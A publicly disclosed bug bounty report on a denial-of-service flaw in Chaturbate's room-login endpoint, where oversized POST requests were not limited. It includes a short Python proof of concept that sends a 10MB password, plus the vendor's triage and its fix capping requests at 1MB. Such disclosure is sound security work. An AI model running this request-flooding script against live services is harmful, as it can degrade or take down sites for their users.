Unrestricted POST request size on roomlogin endpoint
State Resolved (Closed)
Disclosed publicly 2018-10-07T14:55:42.685Z
Reported To
Weakness Denial of Service
Bounty $200

submitted a report to Chaturbate .

POST requests to endpoint /roomlogin/<user> are not limited in size. While the main website login endpoint correctly limits the size of request, this endpoint does not. This can be a mean to perform a DOS attack.

Steps To Reproduce:

  1. <user> has a password-protected stream.
  2. Send a large POST request to /roomlogin/<user> (e.g., a really long password).

Expected behaviour

HTTP error 413 is promptly returned.

Actual behaviour

Server reads and processes the whole request, consuming long amounts of time.


This Python snippet can reproduce the issue. A ~10MB request consumes about 30 seconds of server time. I did not proceed further to avoid disrupting the service and because this attack which can be easily parallelized has itself a pretty serious impact.

import requests
url = "https://it.chaturbate.com/roomlogin/█████/"
csrf = "███████"

password_size = 10 * 1000 * 1000
payload = {'password': 'a' * password_size, 'next': '/████/', 'csrfmiddlewaretoken' : csrf}

s = requests.Session()
s.headers.update({'referer': url})
s.cookies.set("csrftoken", csrf)
s.cookies.set("sessionid", "█████████")
r = s.post(url, data=payload)

print r.elapsed

Suggested resolution steps

  • Put a reasonable low limit to request size, as it already happens with main login.
  • (Optional) Limit the max-size of input element #id_password to 64 characters.


DOS of the main website. The attack can be easily parallelized, leading to potentially severe DDOS.


  • 0 attachments:
lucach Activities::Comment
(Human Augmented Signal) I confirm that the report is reproducible (POC attached), has a security impact and is in scope (targets main website).

williammmllc Activities::ReportSeverityUpdated

williammmllc Activities::BugTriaged
Thanks for the report. The login length is limited to prevent a ddos on the hash function, however this doesn't apply for the room login. However we will limit the submit size.


lucach Activities::Comment
I perfectly understand the difference between login- and room- passwords, but the significant processing time of such a request still looks pretty worrisome. Thanks for the bounty and the quick response.

williammmllc Activities::BugResolved
Thanks for the report. This should now be limited to 1MB, can you confirm?

lucach Activities::Comment
I can confirm, now the longest request cannot take more than a bunch of seconds of server time, which is a reasonable limit. Well done and congratulations for the quickness of the process!

williammmllc Activities::AgreedOnGoingPublic
Thanks for the confirm!

lucach Activities::AgreedOnGoingPublic

lucach Activities::ReportBecamePublic